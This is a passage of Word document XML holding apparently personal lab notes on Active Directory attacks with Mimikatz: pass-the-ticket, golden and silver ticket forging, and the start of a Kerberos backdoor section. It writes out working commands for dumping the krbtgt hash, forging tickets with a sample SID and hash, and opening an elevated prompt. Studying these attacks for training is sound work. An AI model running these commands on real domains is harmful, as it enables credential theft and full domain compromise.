          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File: : OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668C71C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>kill mimikatz and confirm success with klist command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB3EA9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>should get client: Administrator or client name of choosing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FA9CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>check admin share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271A6C5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">dir </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\&lt;ip\admin$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D1774C2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pass the Ticket Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E72239" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>don’t let domain admins log onto anything except the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918DD32" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Golden/Silver Ticket Attacks with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA7DA3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Silver tickets are relatively more discrete than golden tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2B213" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>approach to creating them is the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD67744" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>silver tickets are limited to service that is targeted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA48FC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>golden tickets have access to any Kerberos service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBEF138" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>find accessible service account to get foothold via kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B38CCFB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>then dump service hash and impersonate TGT in order to request a service ticket for the SQL service from KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C98A4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>KRBTGT Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18B54D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>KRBTGT is the service account for KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F03033" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if impersonated, service tickets can be created for any service the attacker desires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475FD93" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>TGT is the ticket to a service account issued by KDC and can only access the service the TGT is from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8DE392" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Golden/Silver Ticket Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760127B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Golden ticket attack works by dumping the ticket-granting ticket of any user on the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1EC98" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>krbtgt ticket for golden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE8359" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>provide service/domain admin accounts SID and NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491B82F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use details inside mimikatz golden ticket attack to create a TGT that impersonates the given service account information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553CE86" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dump the krbtgt Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26B04A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645D6E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30525BD2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>lsadump::lsa /inject /name:krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62996373" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dump hash as well as security identifier needed to create a Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31891CA7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to create a silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CFF64" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>change /name: to a domain admin account or a service account such as the SQLService account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E9F89" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to create a golden/silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBAF627" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72821686" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>golden ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7034D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sid: found under mimikatz input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393654C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>krbtgt: found as Primary NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E10EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ID: 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC69BA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-379540</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230FABB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>5108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0FC2EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>for silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B60CFC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>place a service NTLM hash into krbtgt slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D084C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>the sid of the service account into sid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D422E7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>change id to 1103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334BC2D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use the Golden/Silver Ticket to access other machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7ECAE2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>misc::cmd – will open elevated command prompt with the given ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A27F4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Patch OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B8C2F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberos Backdoors with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDF165" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>much more subtle as it acts similar to a rootkit by implanting into memory of domain forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71826F27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
